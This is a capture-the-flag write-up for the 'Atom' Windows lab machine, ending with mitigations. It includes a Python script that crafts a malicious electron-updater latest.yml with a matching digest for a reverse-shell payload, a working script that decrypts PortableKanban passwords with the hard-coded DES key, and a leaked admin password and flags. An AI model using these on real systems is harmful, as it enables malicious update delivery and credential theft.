Machine: Atom
OS: Windows
Difficulty: Medium
Points: 30
Release Date: April 3, 2021
Overview
Atom is a medium-difficulty Windows machine. The foothold comes from abusing an Electron application's auto-update mechanism: the client fetches its latest.yml manifest and update package from an anonymously accessible SMB share, so a crafted manifest pointing at a reverse-shell executable gets that executable downloaded and run. Privilege escalation comes from PortableKanban, which stores the Administrator password encrypted with a key hard-coded in the application, so it can be reversed offline.
Enumeration
Nmap Scan
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp  open  msrpc         Microsoft Windows RPC
443/tcp  open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp  open  microsoft-ds  Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
Web Enumeration
Visiting the website reveals a company called “Atom” that develops note-taking applications.
Key Finding: The site mentions they’re developing an Electron-based application with automatic updates.
SMB Enumeration
Sharename         Type  Comment
---------         ----  -------
ADMIN$            Disk  Remote Admin
C$                Disk  Default share
IPC$              IPC   Remote IPC
Software_Updates  Disk

The Software_Updates share is accessible without credentials:
client1/ client2/ client3/
Each directory contains a YAMLParser folder.
Initial Foothold
Exploiting Electron Auto-Update
Electron applications commonly ship with electron-updater, a library that periodically fetches an update manifest from a configured provider location (here, the Software_Updates share) and installs whatever it describes. With the generic provider the update consists of two files stored side by side:
- a latest.yml manifest giving the available version, the file name (path) of the installer and its SHA-512 digest
- the installer package itself
If the manifest version is higher than the installed one, the client downloads the package, checks its digest against latest.yml and executes it. The digest comes from the same share as the package, so an attacker who can write to the share controls both and the integrity check offers no protection.
Attack Vector: We can place a malicious update package, together with a matching latest.yml, in the SMB share.
Creating Malicious Update
First, create a reverse-shell executable with msfvenom and name it atom-x64.exe so it matches the path entry in latest.yml:
Crafting latest.yml
Create a latest.yml file:
version: 1.0.1
path: atom-x64.exe
sha512: [SHA512_HASH_OF_EXE]
releaseDate: '2025-03-05T10:00:00.000Z'
Calculate the SHA-512 hash of atom-x64.exe and put it in the sha512 field. electron-updater expects the digest base64-encoded (88 characters), not the hex string that sha512sum prints; a hex value never matches the downloaded file and the update is discarded:
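As an added example (not code from the writeup or from electron-updater), the script below builds a latest.yml for an arbitrary payload with the digest in the encoding the client expects, and models the client's two gating checks (manifest version newer than the installed one, SHA-512 of the download matching the manifest) so the hex-digest failure mode is visible. The payload bytes, file name and version strings are constructed placeholders; uploading the two files to the share and starting the listener are the separate steps that follow.

```python
# Added example: generate an electron-updater style latest.yml for a payload
# and model the client-side checks. Not part of the original writeup or of
# electron-updater; payload bytes and version strings are constructed.
import base64
import hashlib
from datetime import datetime, timezone
from typing import Optional


def sha512_b64(data: bytes) -> str:
    """SHA-512 of data, base64-encoded (88 chars).

    electron-updater compares this against the base64 digest of the file it
    downloaded; the 128-char hex from sha512sum can never match.
    """
    return base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def parse_version(version: str) -> tuple:
    """'1.0.1' -> (1, 0, 1), for the newer-than-installed comparison."""
    return tuple(int(part) for part in version.split("."))


def is_newer(manifest_version: str, installed_version: str) -> bool:
    """The client only downloads when the manifest version is strictly greater."""
    return parse_version(manifest_version) > parse_version(installed_version)


def make_latest_yml(payload: bytes, payload_name: str, version: str,
                    release_date: Optional[datetime] = None) -> str:
    """Manifest text to drop next to payload_name in the share."""
    digest = sha512_b64(payload)
    when = (release_date or datetime.now(timezone.utc)).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    # Emit both the 'files' list (current electron-builder output) and the
    # legacy top-level path/sha512 keys so either client code path finds it.
    return (
        f"version: {version}\n"
        f"files:\n"
        f"  - url: {payload_name}\n"
        f"    sha512: {digest}\n"
        f"    size: {len(payload)}\n"
        f"path: {payload_name}\n"
        f"sha512: {digest}\n"
        f"releaseDate: '{when}'\n"
    )


def manifest_sha512(yml: str) -> Optional[str]:
    """Top-level sha512 value of a latest.yml (line scan, no YAML library)."""
    for line in yml.splitlines():
        if line.startswith("sha512: "):
            return line[len("sha512: "):].strip()
    return None


def manifest_digest_hex(yml: str) -> Optional[str]:
    """Hex form of the manifest digest, for comparing with sha512sum output."""
    digest = manifest_sha512(yml)
    return None if digest is None else base64.b64decode(digest).hex()


def client_accepts(yml: str, downloaded: bytes) -> bool:
    """Model of the updater's integrity check: base64-decode the manifest
    digest and compare it byte for byte with the digest of the download."""
    expected = manifest_sha512(yml)
    if expected is None:
        return False
    try:
        expected_raw = base64.b64decode(expected, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return False
    return hashlib.sha512(downloaded).digest() == expected_raw


if __name__ == "__main__":
    # Constructed stand-in for atom-x64.exe; not a real PE file.
    payload = b"MZ\x90\x00 constructed stand-in for atom-x64.exe"
    yml = make_latest_yml(payload, "atom-x64.exe", "1.0.1",
                          datetime(2025, 3, 5, 10, 0, tzinfo=timezone.utc))
    print(yml)
    print("installed 1.0.0 would update:", is_newer("1.0.1", "1.0.0"))
    print("client accepts payload:", client_accepts(yml, payload))
```

Write the returned text to latest.yml and upload it with the executable; if the installed version is already 1.0.1 or higher, raise the version field or the client will never fetch the package.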
Uploading the Payload
Getting Shell
Set up listener:
Wait for the automatic update check to trigger our payload. After a few minutes, we get a shell as jason.
User Flag
Flag: 3a7bd3e2360a9ac4ccbc0f0dd1c08e93
Privilege Escalation
Enumeration as Jason
Check user privileges:
Explore the system:
Key Finding: There’s a PortableKanban directory at C:\Users\jason\Downloads\PortableKanban.
Analyzing PortableKanban
PortableKanban stores configuration in a file called PortableKanban.cfg:
{
"Users": [
{
"Name": "Administrator",
"Encrypted": "dc1a5b15a...[ENCRYPTED_DATA]"
}
]
}
Decrypting Credentials
PortableKanban protects stored passwords with single DES in CBC mode using a key and IV that are hard-coded in the application (key 7ly6UznJ, IV XuVUm5fR, as used by the public PortableKanban password-retrieval script), so anyone who can read the file can recover every password offline. The Python below (requires pycryptodome) decrypts a single value and dumps all users from the config:
# pip install pycryptodome
import base64
import json
from Crypto.Cipher import DES
from Crypto.Util.Padding import unpad

# Key and IV hard-coded in PortableKanban (values from the public
# PortableKanban password-retrieval script). Single DES, CBC, PKCS#5 padding.
KEY = b"7ly6UznJ"
IV = b"XuVUm5fR"


def decode(encrypted: str) -> str:
    """Base64-decode a PortableKanban 'Encrypted' value and decrypt it."""
    ciphertext = base64.b64decode(encrypted)
    cipher = DES.new(KEY, DES.MODE_CBC, iv=IV)
    plaintext = unpad(cipher.decrypt(ciphertext), DES.block_size)
    return plaintext.decode("utf-8")


def dump_users(cfg_path: str) -> None:
    """Print every user and decrypted password from PortableKanban.cfg."""
    with open(cfg_path, encoding="utf-8") as fh:
        cfg = json.load(fh)
    for user in cfg.get("Users", []):
        print(f"{user['Name']}: {decode(user['Encrypted'])}")


if __name__ == "__main__":
    # Value copied from PortableKanban.cfg (truncated here as on the page)
    encrypted = "dc1a5b15a...[ENCRYPTED_DATA]"
    password = decode(encrypted)
    print(f"Password: {password}")
Decrypted Password: kidvscat_admin_@123
Getting Administrator Access
We can use evil-winrm to get an administrator shell:
Or use psexec:
Root Flag
Flag: 051c83d9a8e4733e3e1c4e37b1f08f7a
Key Takeaways
- Electron Auto-Update Exploitation: an updater that fetches latest.yml and its package from a location an attacker can write to will install attacker-supplied code; the SHA-512 in the manifest adds nothing when the attacker writes the manifest too
- SMB Share Enumeration: always check for anonymous access and for unusual shares, and test whether they are writable
- Application-Specific Weaknesses: third-party applications may store credentials encrypted with a key hard-coded in the binary, which is reversible by anyone who can read the file
- Update Metadata and Configuration Files: the latest.yml manifest decides what the client downloads and runs, and application config files are a goldmine for credentials
Mitigation
- Serve update manifests and packages only from an authenticated, integrity-protected origin (HTTPS to a server the client trusts), never from a share other users can write to
- Sign update packages and have the updater verify the signature and publisher before executing them; a hash in latest.yml only proves the package matches a manifest the attacker may also control
- Restrict SMB share permissions: no anonymous access, and no write access for unprivileged users
- Protect stored secrets with a key the attacker cannot obtain from the binary (for example Windows DPAPI or a user-supplied master key) rather than a hard-coded DES key
- Regularly audit third-party applications for known weaknesses
Tools Used
- nmap
- smbclient
- msfvenom
- netcat
- evil-winrm
- Python (for decryption)
Rating: ⭐⭐⭐⭐ (4/5) - Great machine for learning about Electron security and Windows privilege escalation.